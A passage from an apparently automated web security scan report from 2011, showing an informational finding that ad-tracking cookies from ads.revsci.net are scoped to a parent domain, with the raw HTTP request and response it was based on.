TWM7TamF13B/4I81rOnhOB3Cf5HdL2ta+Tpy/K/EkWIVU5n88x+tbqebu7Gv3ntjfIPi2GoqfJnf0yT0bq3/rKZStBcNgmkdOlznSLt6icFrXBkXxUHE+P/s/ygWHfN+H802yEcH+SmF3YmG7elfVnI8MZOn+wHXvGYhN6gt6fthHH9DxMFJ43SCf82XuqVC5RN/p/5ih9IKRWetdpROTTUGahGtzslTstONpZqiE6+OWBsWLqper3cKN1tIbdoc2xOKc9mRPzdslWxfAM90OnrQflInh6aVIiu5F/tGORM0W/3o/Y3Md4YmLoCJkIf7Py3uJOv8wCYEqbfe9AZJmokscagjl1PN08p8TY++4ohjWNXE5m4DQWHcDuQM+oPEAGBOYybdvHcgH5cR9kCLHCiF4iNl949i1AWEhDtqg+ulnAMC2JVMaXzdI+A8Ol7PCad6cZBXHTNX7bxfK/kT6h"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__uYS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__uYS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gHx8="MLsXrrEOpxpv55C28tahZ2a57v6B9McZgL6ClJPbnj9y6INXr1ST6VLylaFsMiOIF8KHpjjz7J2U74uKff8LZ0fiJghRv1hoUC4Ww6xSAkmfs1lNuqBVtzyf4hrUHyeaCpV6M2MoC7r7STaLvqoiVDgloVhGO8DCKXMuP7SUvV0rRvErs5Oe05KtUgVRr11fNozw6WGAGmzPHsg6pWeTEHX7jolWibjgwaA/V9oOOLDrbmnazHhTj8SzE3IiH4H0na49aet3nkOO91ZXKayz25agMj02Y7dkjXSVwZ4xpm8C32oMikZ7wKy8X4WHkeLlUVv0d9FQvEIFkw82vwJ/T4/8zCulYzvx0vNKbiJ/sq9LgZHoLnMaeIV8yV89S4G559IlmsZlfhiGKAyN3D1BjqWHBn0Yvipp1a9+adnzbGTPpdYr4JRgNW/40hZ7TVrcaaEnMXJjvErbJbWU2/kifM9+IdSDr24aF0pspxzBL7I83FANAsxBhffSMamxXhQo4MIjim1xDOR2lhyWUi2nGcjntzqDCMC4wCthjwelblqeAmjhTjxxu+ypY+5eOjjQ0ebloC3YciHL0jt/lzpPKK773zxn8o40djk4yXgdhfgGdBEzu723IufB8CJRGM73t38kd3w8MliO5anz4gYExPJgFYUsoC22cJEUjirsoqc8BJ8mXelunr0QTQOUd0oGkxLSY5/uG1seQXR7zpYaDwKVeD3r5rJcYXGxtt3hklTSY8/WKmKt2C5sqgi6OpySZFGYQN0k+rQx/hRLBAzTaRz7PIW1NZPApCPiNubXoAjxFB9G9oi/2d5jlBNCe0+Hf1EMEtPZ7aWFwmlvpDZkMnYMB98lK1RLUBzScu+1MS1w+coLUCbfmLFsAr75oZCeizipWOi6PXTfQc2e3wXc2qrKarr4AlRl9ft8T9A4S5rnvVivQv13nkdWrojhVcqWMin9uYP6rbkwhI2s3c2gpkj/bV0ReY4/awu1kl247Lt/6+ySnvbYqR7Rg4bpMrwM8UOeT5b8XNWcVSQZ98JrOk2e4kibkyQTJTx39DrvGsoSB+K7m76qmF3dokQo8Zbw6S8Knx7KkO+W+I5TqxK2xvOwXrO/dDSAtzxzQOnnuymZ9Mjw5MzE5zUYG38JUNkMoD1GpsZdjqo3WkIphw6Jh8+tdtvV8I7mEPM4x2c+qfq0+YItT+/eBJNxstfHCGrs7P7GOUMnQkBAXEnT44+MpUOzUBryW1Od300eBJuxRcuVw6VQ+wzi473GhREIEVQTVBFDfwlm4SCwTuB4z7JHMi7zZsIA0DUx5OqopBkPxdXyZRHv9EajQ+1M3+gIk9i1jIHjiSKImnPsjdsH"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMVIylDPyYU1H0tRld9SwwgjXvKha3TiO3zK74UdwN9eVOyrK5IpUo0yB9yJWdF8U4552FAyEJbn6rsSYG7uDMANZ4mCoJQ+fbOnGz6eQa0/RwtzNX7YipD+7dbKN5v7/Zu9Z9VvFFtryW+ipH959YzOLPm/YYqONJZUgGRjSLZa3OBq9x98QxSfcY12zUJFWqhJStZHbxgK3do8ybBUSpgLkDGc8bRhyTbRiITdSsqeYFzSfqHMS2NISVM1/hc7NflTipjQsDIt0Sf0nrMmnv/UVhCrQXOmO6tgHbj1eF17QwXOZCSxnzhwuilGScXHKAYMJ9erA7J8pvnvO58BvYyFy/Fy7oo7Rl0fWqaCEguJab8/rl2ktSOKllzZ5Zwlkd9X2XufDh5S68Y9Kxff9yHVBClZd4GMyu+h8+CAPliQ3msrcMeJBPmrWFteEw0g8TUjdn2o8Qqp2UENew6fWI7XR7TJkAWEQGqtSJkWK11UzkmR0qETeNTCM+zwAXtBgLx4uocjZP6jtlepcgQ+f6YqKSqvossJJc6Kgdq/fTO7DHPX3cj7+GbCr1BCwscwxylQh2rovssVJgdVaZtolMmLsn4GNN19XSS4YVHoM44su5dZZ40//lCLjp3tdt5feJ3QDhfBho9YGRegUWc2wbqcsTPtSwEFfyDPkBq2gpsPxuUw8voHfIKqmUXZaENzCWPxWpSDmNYMo8IxvIE0ro6qhRSVfb9HNBaGFJW8piQTq1tJGu5FuYyiij3/KqAEyqA/oORCCRPxDZa6F+HeeaqMpJwv93FI1EV5uucPc2rgNnFKVOADmdI+KyTPcxI08JgW9I3bWEJhaMVNpz+WqM8w40TZ+hh/3TBLUMG9I8luQieecb/2EQWwx17gZnhPNR+Hs7v/0iEkZ91qni8AQS9NFdcrk1S33Gq2lPyQqmVXKQHGBKEH23qJHMODr41vd9GIlnlTT5cCF3YYRn5XGaS2FlaPy9ksq20x8Rto4PUhY55ed/RSDVC7yZhUIKFgfrc0SBQxsypw34g4+smFeDCk2GNdOMr7+xsGrEkJJOxCkBQN30VLnKkkf2F4UEBDIm8qZn+QxTQFIX4GicVlXg0psBMXqe0pHawKdNbSPKoU+sQLBbZS9KgpQN6i4b0cr9PCCInEJmPecX80UysOO7l35W1ax2td2QkZV+JFP8T5Othwh4gXKyaTOjAXwEDaco2NL5bPZyherpF6Z6k0TOooer9pbWGVnm3Pc3PI5mMMcc/1MCoelnRHvt6lpupBrfZo5v69ZwC1ib9NXM6Ggj3E694sq42WcNVdVquhRlNzXOFz8qDI6A9aXYoo1v+y+EheE4HUIxzlQh0tk6SVp7iNwEIEDPOBhL6CK/jxrErtZC7ThF05z7isZaV/RO86qhvvivnQ/gdL58sZ3zCmR34oV3ZDYPBu0fWPutf57j28KxTh29mZK5FfUhXJ9WU4xqjy65be4PrXZMihSw+cCoJlpbyeo4Y5sSityMPjX1m+6EMUZ7eOTzLHaN2zdy/AcC8k2bRtkJc6MQmjmNafWssqqQHK6WhuHFHWgyuXbWrJNYv3R/lc6iKLEhzh+0kI2EUcztqFEOGlXBrKQkvlSXvad7mLnZh1nOVfpg14a/J+IJa3Oq9vOL5bXiNQpIdnvDnZzetcpKnHG9RoJlPw2A1CIERl0rZ8I58Ni9WJKyrugjUsZjaVh9HhJZvYjNLxGzql5phaNf+XP23GQjdsn3Dd9JevWwUunKgWDFRHZs="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:03:11 GMT

GIF89a.............!.......,...........D..;

13.19. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_G9_S="MLsXrrEOpxpv55C28tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YFJsaw08qSR0PlQ+NWVPKJRSeakCP8BKl+9vpw/cPKd8tMuxPMCPoyxK8+ZjwDWyB3QMrRsmCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3xqwMP1zgKetVA0BJNDkK20CkficwaFYzIKDZj0KoqzqA1plxgzv/HJ62flvdxhJ1Gxc/BJ/Jkbz0IOuABhmPV05MhqOZD1eXu7sZ4FJ+3eLS0lWDg6HphwKX4gWwd2TZjHpNiYllNlCCt8+VPltAQi3QZQDF7gqUh3eOe1UMhdJxDYoDprFGFL0tgWNie0vdlcMg7d9TDMHvdWXtnwVDETYEb0+0k2lAsYlAa0wyNfiS+1z/gYvdtYy5wMFuUlaQGZ46942BuOwVh0JbAUSGUHgxiWAiJSgm4uSRkM17T7hE3OXEIVJlRaMcX/neeys7HYY7MWGQdhwbw5QP6+mxS8XJ42CRb1O9S2ZH020pDZTLP/2xbvm80WIj4KrD88n9gyyojJIW9vWIMUtdlpg1OxK5zL4VkGL3cLuAJe0xvjKA7bfLIskGGuMlscDOPymQVA2MMlYO1qHEFdDJtI4pCc5RQanuRi6mbbQkxKW3NradsayUtcjFwByl4q0Ns2NHEVcC5yQB/eMs6d4KktD/gnAdAaArbd36hf2ZjHD1oVxkBxCfsc7dDVAyfC/JpkL2UBhmZJZNlL0TCaRdPwg3P/Bh1VheUPetY5IpoWRiVHoAgFMBjn1aTdZw/bhXXNm4VF802HpgDDbwPCQ7mdVOnQAgCyx7Xb8pud4W1ItqEsomU3WoblAx5/ljOZesso+t7L7zFVD+OCiKfqhMy6irDFWju3OFon4GkOvNY9ISl7k3MQRhTrsGzm5ANbPDN4T8I3J/OPR6bDbHY2kiMm+Uk+/uW4K/eiliOo4LICBO/LHnNyWfvUFM7uJnqQhH89Z8RrroFex4a+6I/pnH/Ls01Kep6c/sqiL+d+aVz548eZuZtbEtV6ZQP1TyInHh5N0JPno9ps+A971MFf9IRfGPz5WbAifoCCEK0l4Gwj3YGgQqicfOmPUmQrEnfHaIUdHlruFHFC7FekovubN9IZPuGAqrTeRT8jq5Jp7gEGdlcV49FZLOXxKhVEKIxuSX/PL6xnFfi+3oy84eLsQer1wahgrfrw7xbkQDYVMIqWOiG9Eq2ed0zaeb3vLaINwr/mkGOJKnXg0wl66HlxTleLBBKEhtU3fCNjORp/ElV91Ici4BBDgSU0B7enpTQzS5bf3LCTza/qK+il829xl3RlF12J/NPO5Ja6nB0PGmZypEvg+obtEbuglgXQdPgeflHNvJJstEIZMKKbG73c4rOb993WKfzmQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z7uOqvJR0SNgYO9rFA7CKKB3cozzIdHGjDg2GGihSl38aywkVPVOtaw0GYpb8wbKFEoJ4Hcf23NGtxzjLNjNuJurratNJclKNlnd9kzlWzI5NtujBhqBWWTvdbDCExI1GmrTV9+t5Qks8B2hMYN+2JGnOr7DoSJTvO0PaX3MMt1WYWwvzwFp8R0gsr4WhgVAZORHh0ZLSweLXTo2rLuvFLUXSFwSh2CBWYf5waqWg6FOMqpGQAHBvSeUfM6ov4VVfErYTOmeKF/pbg0OB15tgdJXYh9msh4wx9rx1++0omtJcttyXX8psg0RFshrgzw3uNwQOL5/4Bp/nD9j3X8NOg+dTXBgyQxTjPYKp49l99X/nliGkZ4z6cssziKyg2VmsDy5/Ec2BBARlr4acUHvdGXFLstABR87BjYCnxClCN/BWwe0z7B1mEXTKiAcj9o8mxSkMa1UZ1xZ0rk288ocsm3TMPhrqjaL4bzGrk2gzm5VxKcFW8401eFfLF8rfZKS6Q++UsgSccCDBPlNF1r/N9QYDL1Tq3ssuCoS7HalBy9EaaIsoULjCQDYbmSv0pV1vxJbHeBjvVECwR1N9bcPwGwMvnTyVvp7LetdvcJ2Wbjkwyltj1+JZErC1YDjfccBz1anvzew6CzqHx8L1CRbl1jAMEWa7ge3rsvpF3wKA/hDt65DYYEOfLBkXQHbTea0eTFmoDh6s2ghA/i63LKGRwLgKp3bQqbc49tyzZdDx0fuCQuONaAB/piUUptvOnIaTduWL+WiiFIuocQeWylRtlN7xS+vlsvOw9uBVgLUUTzxVKCNtL35+hiNBpLBXsUwwJOX4bVhSAZkToM/noTwSN8mB3dyb/C8jUcPM8r38/FADFc52dhJySTXbFsyPZts9RhKvtBndBTEO/D/2xdu/StA3LWzJHQIcoitFFG5SQKKoSswDtldD5gfYCVOr8nRXk7GVTF/Q35kHNr+U3zibnEIHpCMPqcVOoT4KwUB4733Px03aQaq5xmE5V4vig8CWJVP5MbSbt7PH/6ZDdk2qlecaHojQv6+pswZMaZEVNiygNS2D8aIvemlup34PcX7GsFsYNDKXYRA/RKMK+zlUjMDHZMbyHToyybX49t1qTWKbr/cz2zNm4cRiTKD0vjdfyHDSVasz/IoblG3aqiP+9nvYuUMQuaai1LmXu7nx968NLV4d/zJIdvOyan/9u/pBbh4x1zd5KFIsGW60anqWRbLMpTmt+dOCfrIOTNQ1Eao5qx1igbggK4cIy9qIiNEXCw7sKCD4f0uKEJPJj7ImwqlvknZIKkRjFcR5I2/q1cFad40CWx/bUtUza29oL0un+jskHMd6kf+Qc7aq4KZNsO5wW84lQa48sKaHVN4NDwMiVwTBF9w5Al/S4uRw3dHJ5oM6ERbSofk3DnPopCFqVreGUP4wvGwVAVP70nK51xkhFjXSBgxzer+/7xvw6GV9UAb6wXT2102bz2CWwPWL5xjufpN5o57ve1w5sefuCGuvUEWDaOSfxLODBuZ3WeHOTSoX+B1g4N5ysz0gGgzh2d09ivuTg9KO1Zt34hNNwjXCpUAhMJQYIj37Vg7I+lEVOTMNf0tOKjsv+eRSSALE9hRu/JjbQu6d5WPQqQ4sHYWL986PKwsqKLeRZNbnN9D3yp/EqKJPmRH+2KZlmuAlRR0SQuS5iY0IKYNTCLw+pU67RpN/haHkbLTVbxtYpIJOIEum3+/1evQx+KKBg1fNpoQRJuiy5sGf47ULyOwbV7R1B1815tz53RzlY3ATXdhc="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=E05510 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4j+huXIMH/C1v6FY5BBdG2vMpqLhSnJol2IUPsJbus0+tNf443NrkvBlDss6IgvcvW8ova5kI2P/V/BVw0aNn868fOK8Dy9xw0TAYvHMczr3EMFgbbmElzdU7GJvXSYySD/k0bGgHELUgeDilqQHpnA9s7sER/+8h/9nNrzaqqNb3AP9/i0SnbfLq6Dh6gyBCP0WLYL6hey/UVhvuDpzOPhEl1ZjpmIAMelrzbhkDOPjPb1FAUDBerYVnJKdlUPnq5antNg27LdOwBZioN4tryEpXXE6LodPEmSm6JMLFmNCCY/wCiUJRPPGNTDulRfKsqeNgeJTAMCoT3h/FlsZznMVEQI1dGv6oVfTkn0VRez+QymRzJDhmafb6GXgJF1s5xfICdCOJCxm/fz+8R7ly9rR/dBwF2CuXBmEaXk17vx4z5MMKbzgZxIF3xUfSuBccyNcgujeroPdkDFz0f61qLXq6O+oKZXIvhdT2oCSDrJ+gmqEkPLttN/0AhjMxFTPmReLtyNWAgA+RQyeIAGDRsIqFtkLnGMtMex7P4cX3cbgmlEXYHCGQM6rWWH9n/6RL/jKyvJ5k1mbEY7fRuqH7ma8T1fjn0ZqkoNt3kGNm86MlKPuyiq7tUVtcyMdFznE89p8gUd6/wtm0YlGNfnRRTLLcY0x6OegmaCs7O8Aj+83dsPI5DsNM/QYWiETRnzZ02iTBb42RQ6o58sjr1X9YlirA2E+PaWF5Cj9Y55OPU0MV7XLzFGmJCdBRIrZFfXxPH8hZ3qvwVZX7qE43bBiIPGQhETp8Jj3HhZM0bKIe+WZWGf6SXhHCc4=; rtc_6SVK=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; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_hjCW="MLsXrrEOpxpv55C28tahZ2a57v4BlBm9Y8OavLvXmNxWyY+bhP0TqX40neBrVzd0wSQq0FGvdh22EpPGBgiyPKLxJghVv1hoPbkGAV5luxQek5y8BQn+B9prQUM2WJZ5fTuL82yjqodMrmoMgdbgq/o91bP5Zj9EonQ6upsfRO+jY8DisQTjxJrmuuMKFZcPeOthmZA7m+lgo79tGXA7Rpfs7ep2p7s6ZNC+KizgnoD9KrASxX20oY+kbUvby3W0iS8IC5Aru+mtGUpz2IybKzLWwl4a4Djh00WFi3FhnmUDRIETGzJoTKtyfV2nlSGlGDHU8j4m5WErIZUpF4uuZlOkb3gdnGNZouDhXMC1POnlZhPPKkpUtUqMzIFEZBoaiXt+39EhtOmsDCGSz+9rsM6na1pcn7bsmoEkrOynDWTPKWp3nDx8JfKBrgiTq9LaoOzpF2vpLx51hKuWVC3n7NhjkIyeI21jfODuKpsTZJ0qAGbd0tFPhbP+8+m5r8ZjkLN/cd9ZMjaEsyNGh4OfzkQHC04p0FAq2PCeCdjhE3IFZamnakGUUBDvbQqSqQghGzjeoJsW5qB3XzNq++ypbPIbO3uWtPXT8ugDY3NyW1JttQESSXiL2DEutbvUX21Bju9qCYoEfAcPlC2hH0ZZbYq0oeBiAsCJDkEEjWtlDZHERo/yntbo2PWyLQuacypOsyV9laoVq2mJ790KEgMe3HRwdKMA0ZNM12noQNImq57cD5AZwSLgiCvAtQ9omybm4HIVDAihrsez+I1pmanlBIMrWfSUEx22hc0VxqR7mjaj+aEQOnRwrNSkwhfLQxmPkW95P5+4Nvwj41pYhLhPYRr2DGJ6/AmiwJQj2OGn4qJIDqnXSDoO2CrozkuBdkqGZVAq2Ko6zHLUeqPDRM/Zm/ctKZTPLzXX0sOEuNdP3v/+dajCHbCylk3nlEkyfxSeejEGf1pcXieFuSeKRRsj3gQIV5MjDPvmKqGTSRtNo82LO+Dhiz+w7Q/7z/wy0jMMpRA4qivdxIxStpdLNz/tn0mdVOTQinO/cx8QjhX3ydihLInu0vJh1Sq0YAiAinb33t93pTUWeRMuK4OK+bFMJc4W4Y3N6FftW3j9DhDz0bU+x6M8/+VSmEH3i8u9leHJodTvE7Nu62BTO91449QtmzOAfcfJpCK2PnyRDE1FOlr5glA/iR6lyV4/airi4/Q46MpXflCf5B/vCDqtq5psRiF5+EjXePj3bgUlknH1S5dfeXgU5cGv+cBlQlfjuYPGjIC3w0cU/FbT7Hgk8jOOixkNkbjj06y/JBcT7gbUjp5fl67fbZKtgiKjm6norre/kL+37vzIV0QTaDfciblKDMDM+EFsR6FNUS8OygTKqAgqg59K7Fut6g=="; rsi_us_1000000="pUMV4y9DPxYULWF0thvOWWVe/X6q9GYPHpB2doamCKZ0HdQ/HXWkpRH/Ms/F0FIWwpOftESMlGYf1bDSl/ir52l4cGsjAFHl29ihtu92QnSPhbmRPk79IDMxLMzW4QIoFcRSTZXsq3PtyxCXCVLXsRUo31TNf16uqZJANoqJp1NYh3efhp8q6dteu4a3S7Thi9lnaGV9RObaakVO3CDjaOpNTdqivOYUKZSThz7WMa92oA4w8XJNLb0JXM2832nLwiFB9SYYVZnu3z/cwepIuGXdqDeB98nNNl0eMqYPWVrNhTPutwqKJmiWOqb1mWoSX4V71LUYefyU8Zss1u6mhlIwYyAvf/RKoLLZwVVp0d1JBLfyr/tZkhZU3Iy/8F++PCDZF/sbmOQjK4hwVvka0FRyVDPJv4H+YyqzNrWHGLp0n8mXd5bXtGf1Tff6WOlsthHq703CC0v7B1mEjbUKV1Q7GB+D59gTVmu0fEM/ck785HsUOmnJxmDknMw/+M7ANXuRCP8sbpAJj21XP7AbB/EGWSUTayGKzrnkQFIczaswmW1yaMhAKFpqKxoZzowD4+BsdEQAUx9WjZOzamASxwpAD9X90KNReCc+K8LCTe1Igr6hl65+w4Ckavj2vCqoLyXW/GYi6UZlBr1ZvMQ1g3WnVqskvsjmEHlmDfWUEdeRjfQ3L5ZD6+OjUAgKohgkzsjtVodoMl1RAzuLEjm276e8WYmO52Amuvlok1z6mFXHyP/kTBJBtJDoqukJPg6ccxcR1RhvSxUKsc8AOgxTDyIGgSdz6ouhQvyEeR9HbQ39Epxo9IpGGDPyMQbHBPwX1MNEszdJCLGMq6NJlZCEtMJZUwyx5ZpDA/+8gml7VTMOz1UGxuAP0mGAFTZoKaCuCAUAFfZz8mNl6ueymUFqob6Os3X2kYvyrdeQwI7ozrlXYoO4thHbiNDS3xkLH1Ta+1mU0fyTq3bzznAhgDSIBImy836OzEGaR1WATENi8R/YNg1tdmyJCDDm+y1XxYT041dWsT5TRyGsVAbcMU0OKLUVP2fLbek7cLbxvDcm1s9dJvF0p1WQMe5HsgHP9fzmxXgy7J9rUjs2B9BQLw/5KokV5guHMwLSCKGnQ4+CtdfZND4pmD5f0q/8MBmg1nrNPF9NqpPzj0+n/4EZY0qIKzuenFBaNxUYpYVa21wtYWTZWzg8NXMIHPNy8fSPKuVv6RS3te+QR8z97XEke7Me5V2KjTohCiWh5t0irkX9AhmpR++Z7Jj9yqkMaGQ3zFRj9/rX0jZR/huUn36hc8DnfS3bH3vzxluRwOli8kQUbvA8FFZaEAy0lbJfr3n1Up9np1DOkfpSAskN5QwKzHO3SAKXP+tEA/xhQswseY0gAFfQOl/f6B76CsnKQ2iceRfMiUmjdAs3Txuj2eJqhj1YDClnoICqG76WAN5H8SjPlxP9FSbcgQ0YcgGQ4Ry+MRZdC2p3snp34is5jHgK0ZCL4UW9UMBDqYJe5C8i3UN+aybtDgGqKYecTKyqybG+msluma4IkDrK9eM/QY86EgogFLdSsg1PgukD5Y5nde6LIxiKYKFFMRDDGUrqXJHn3FLUr09d7to